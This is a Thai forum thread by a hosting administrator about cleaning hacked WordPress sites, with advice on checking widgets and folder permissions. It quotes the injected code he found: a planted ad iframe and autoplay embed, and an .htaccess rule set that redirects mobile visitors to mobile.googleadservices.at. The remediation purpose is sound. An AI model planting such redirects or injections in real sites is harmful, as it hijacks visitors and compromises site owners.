Golfreeze.packetlove.com: Life style of Golfreeze Canon400D Family kammtan.com Jazz Freebsd Unix Linux System Admin guitar Music

All about unix linux freebsd and FAQ for Packetlove.com Web hosting , Mail hosting , VoIP + IP PBX server => All Security via cyber space relate golfreeze task. => Topic started by: golfreeze on มิถุนายน 03, 2015, 11:26:45 AM

Title: wordpress โดนฝั่ง สคิป redirect googleads หรือ youtube.com หรือ googleadservices
Post by: golfreeze on มิถุนายน 03, 2015, 11:26:45 AM
ให้ลองเข้าผ่าน browser "firefox" แล้วใช้ตัว firefox debugger > ตัวตรวจสอบ

เกิดจากตัว theme มีจุดรั่วให้สามารถอัฟพวก iframe ฝั่งเข้ามาในระบบได้
วิธีการคือเชคcode ใน menu "widget" > "Text"  ของ theme นั้นๆ แล้วทำการค้นหาดู code "googleads" , "youtube" หลังจากเจอก็ทำการลบ code ดังกล่าว แล้วทำการ save

<center>
<iframe align="left" frameborder="0" height="280" scrolling="no" src="https://googleads.g.doubleclick.net/pagead/ads?ad_block=2&client=ca-pub-6219811747049371&format=300x250_as&output=html&h=250&adk=3611498851&loeid=901642%2C942637%2C946008%2C954812%2C9407664%2C9408101%2C9408134&channel=yt_mpvid_K5RPmvR-NqYRDgax%2Byt_cid_23128181%2Bivp%2Byt_fp_wl%2Byt_no_ap%2Bytdevice_1%2Byt_no_cp%2Bafv_user_id_U90cEcCGGi__cY2fK5IbuQ%2Byt_inline_install%2Bytel_detailpage%2Bytps_default%2B0854550288%2BVertical_211&host=ca-host-pub-5661160663989943&ht_id=8143382&ad_type=image&ea=0&alternate_ad_url=http%3A%2F%2Fwww.youtube.com%2Fad_frame%3Fid%3Dwatch-channel-brand-div&flash=16.0.0&hl=en&url=http%3A%2F%2Fwww.youtube.com%2Fvideo%2F6pViDULLOVY&video_doc_id=yt_6pViDULLOVY&dbp=ChY2MTc3Nmc4MFNhYzNvem8wRDRobWlnEAE&lact=-1&yt_pt=APb3F2_DfyuEgHbYDvwenfl4z9_3rYMsSj4jXrJxGLMnsoXnHbAhn3CwryVhgtYz-pQFvCGOZzvupK1ElJNawp0uMBXEa1kiE17Dnb2abYTPbRZa5UHIFk3uAtlcaynfrxnjfOczKdJN86kkC8LN&dt=1427049316865&bdt=6703&shv=r20150317&cbv=r20110914&correlator=6759326548722&frm=20&ga_vid=514479999.1427049317&ga_sid=1427049317&ga_hid=1262702782&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=768&u_w=1366&u_ah=728&u_aw=1366&u_cd=24&u_nplug=4&u_nmime=43&dff=arial&dfs=13&adx=914&ady=75&biw=1349&bih=634&oid=3&loc=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D6pViDULLOVY%26noredirect%3D1&rx=0&eae=2&fc=24&brdim=%2C%2C-8%2C-8%2C1366%2C0%2C1382%2C744%2C1366%2C634&vis=1&rsz=0|8||&abl=NS&ppjl=u&fu=16&bc=1&ifi=1&dtd=113"
width="336"> </iframe>
</center>

<script>
<object width="420" height="315"><param name="movie" value="//www.youtube.com/v/6pViDULLOVY?hl=en_US&autoplay=1" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed src="//www.youtube.com/v/6pViDULLOVY?hl=en_US&autoplay=1" type="application/x-shockwave-flash" width="420" height="315" allowscriptaccess="always" allowfullscreen="true"></embed></object>
</script>
Title: Re: wordpress โดนฝั่ง สคิป redirect googleads หรือ youtube.com หรือ googleadservices
Post by: golfreeze on พฤศจิกายน 09, 2015, 04:45:37 PM
Packetlove.com รับแก้ไข กู้ wordpress ที่โดน hacked
ปัจจุบันนี้ การทำเว็บไซต์ผ่าน CMS: ที่ชื่อว่า wordpress มีการใช้งานอย่างแพร่หลายมากขึ้น
เพราะมี theme ฟรีต่างๆ รวมถึง plugin ที่ถูกเขียนและพัฒนาขึ้นมามากมาย เพื่อความสะดวกสบายในการใช้งาน รวมถึงหาฟังค์ชั่นที่ต้องการให้เว็บของท่าน

แต่ใครจะรู้ได้ ว่าในเบื้องหลังของฟรีที่ให้มานั้น ก็แฝงด้วยสคิปอันตรายต่างๆ รวมถึง โฆษณาอันไม่พึงประสงค์

วันนี้ทาง แพ็คเกตเลิฟ เลยจะนำเสนอวิธีการเชคระบบเบื้องต้นเมื่อระบบ wordpress บนเว็บของท่านโดน hacked

1. เข้าเว็บผ่านเครื่องคอม แล้วถูก redirect ไปหน้าอื่น หรือวิ่งไปหน้าโฆษณาต่างๆ

2. เข้าเว็บผ่านเครื่องคอม เข้าเว็บได้ปกติ แต่ถ้าเข้าเว็บผ่านอุปกรณ์ smart phone แล้วโดน redirect เว็บไปหน้าอื่น

3. โดนแฝงโคดมาในหน้าแรก โดนฝั่งผ่าน widget

ปกติทางผมจะช่วยสแกนพวกจุดรั่วต่างๆ ให้กับเว็บลูกค้าอยู่แล้ว โดยใช้ tool ของ firefox ที่เป็น inspector tool ช่วยในการตรวจสอบได้ครับ หรือแม้กระทั่งตรวจสอบระบบเว็บเซิฟเวอร์ของท่านว่า มีจุดไหนที่ให้ hacker แฝงโคดเหล่านั้นเข้ามา หรือจะถูกอัฟขึ้นผ่านพวกไฟล์ .htaccess แล้วทำ redirect url

วิธีคือ พยายามดูใน path ต่างๆ เช่น path “wp-content/uploads”  , “wp-content/themes/” ว่ามีการปรับสิทธิ์ให้เข้าถึงแบบ 777 หรือเปล่าคือให้ ทุกคนมีสิทธิ์อ่านเขียนได้ทั้งหมด ซึ่งถ้าเป็นลักษณะนี้ก็จะอันตรายมากครับ ควรปรับสิทธิ์ให้เหมาะสม หรือเขียน .htaccess กันไว้ ว่าให้อัฟโหลดได้เฉพาะพวก ไฟล์รูป .jpg , .png , .gif เท่านั้น

สำหรับท่านใดที่กำลังสงสัย ว่าโดนของเข้าซะแล้ว และต้องการให้ทางเราทำการตรวจสอบ หรือ ตราจเชคให้ก็สามารถแจ้งเข้ามาได้นะครับ ทางเราจะช่วยค้นหา และทำการให้คำปรึกษา เป็นอย่างดี เพราะเข้าใจว่า เว็บไซต์ของท่านมีข้อมูลที่สำคัญต่อธุรกิจของท่าน

Email : support[at]packetlove.com

Line : Golfreeze

Tel : 086-4150926
Title: Re: wordpress โดนฝั่ง สคิป redirect googleads หรือ youtube.com หรือ googleadservices
Post by: golfreeze on มกราคม 04, 2016, 09:14:11 AM
โดนฝั่งสคิปใน .htaccess
จะทำให้เวลาเข้าเว็บผ่านมือถือ แล้วโดน redirect ไปเว็บแปลกๆ เช่น mobile.googleadservices.at


RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|IOS|Ios|Ipad|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://mobile.googleadservices.at (http://mobile.googleadservices.at) [L,R=302]